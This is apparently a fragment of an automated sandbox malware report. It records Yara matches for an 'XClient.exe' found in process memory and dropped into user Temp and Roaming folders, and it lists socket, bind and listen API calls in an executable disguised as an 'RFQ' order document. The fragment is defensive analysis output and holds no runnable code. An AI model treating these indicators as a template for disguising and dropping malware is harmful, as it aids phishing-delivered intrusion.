Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00476283
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00476747